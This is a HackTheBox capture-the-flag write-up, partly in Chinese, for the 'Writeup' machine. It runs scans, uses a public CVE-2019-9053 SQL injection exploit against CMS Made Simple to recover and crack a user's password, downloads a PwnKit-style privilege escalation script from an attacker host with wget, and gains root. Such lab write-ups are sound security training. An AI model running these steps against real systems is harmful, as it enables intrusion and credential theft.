title: HackTheBox-Writeup author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Writeup.png tags:
•LInux
Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138[sudo] crazyinside 的密码:Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 22/tcp on 10.10.10.138Discovered open port 80/tcp on 10.10.10.138Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup[sudo] crazyinside 的密码:Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CSTNmap scan report for 10.10.10.138Host is up (0.20s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)| ssh-hostkey:| 2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)| 256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)|_ 256 93eaa84042c1a83385b35600621ca0ab (ED25519)80/tcp open http Apache httpd 2.4.25 ((Debian))| http-robots.txt: 1 disallowed entry|_/writeup/|_http-title: Nothing here yet.Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 12.77 secondszsh: segmentation fault sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt# __# _(\ |@@|# (__/\__ \--/ __# \___|----| | __# \ }{ /\ )_ / _\# /\__/\ \__O (__# (--/\--) \__/# _)( )(_# `---''---`# Disallow access to the blog until content is finished.User-agent: *Disallow: /writeup/Crazy:~/HackThebox/Writeup$
Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]
没有更多的版本信息。
Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple------------------------------------------------------------------------------------------------------ ---------------------------------Exploit Title | Path------------------------------------------------------------------------------------------------------ ---------------------------------CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | php/remote/46627.rbCMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txtCMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.htmlCMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txtCMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txtCMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32668.txtCMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txtCMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txtCMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txtCMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.phpCMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txtCMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txtCMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txtCMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txtCMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.htmlCMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.pyCMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/34068.htmlCMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection | php/webapps/48944.pyCMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txtCMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txtCMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.pyCMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txtCMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txtCMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txtCMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txtCMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php/webapps/49199.txtCMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.pyCMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.pyCMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txtCMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.pyCMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.pyCMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php/webapps/34298.pyCMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | php/webapps/46546.py------------------------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No Results------------------------------------------------------------------------------------------------------ ---------------------------------Paper Title | Path------------------------------------------------------------------------------------------------------ ---------------------------------CMS Made Simple v2.2.13 - Paper | docs/english/49947-cms-made-simp------------------------------------------------------------------------------------------------------ ---------------------------------
漏洞编号为CVE-2019-9053.自带的脚本是python2的,无法进行使用,Github上有一个python3版本的:
https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt[+] Salt for password found: 5a599ef579066807[+] Username found: jkr[+] Email found: jkr@writeup.htb[+] Password found: 62def4866937f08cc13bab43bb14e6f7[+] Password cracked: raykayjay9
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htbjkr@writeup.htb's password:Linux writeup 4.9.0-8-amd64 x86_64 GNU/LinuxThe programs included with the Devuan GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5jkr@writeup:~$ sudo -l-bash: sudo: command not foundjkr@writeup:~$ cat user.txtfe...................................jkr@writeup:~$jkr@writeup:~$ wget http://10.10.16.3/pwk.py--2022-08-21 21:51:50-- http://10.10.16.3/pwk.pyConnecting to 10.10.16.3:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3448 (3.4K) [text/x-python]Saving to: ‘pwk.py’pwk.py 100%[=============================================================>] 3.37K --.-KB/s in 0.01s2022-08-21 21:51:51 (236 KB/s) - ‘pwk.py’ saved [3448/3448]jkr@writeup:~$ lspwk.py sharedvuln user.txtjkr@writeup:~$ python pwk.pyFile "pwk.py", line 43cargv = (c_char_p * (len(argv) + 1))(*argv, None)SyntaxError: only named arguments may follow *expressionjkr@writeup:~$ python3 pwk.py# iduid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)# cat /root/root.txtbf84..............................#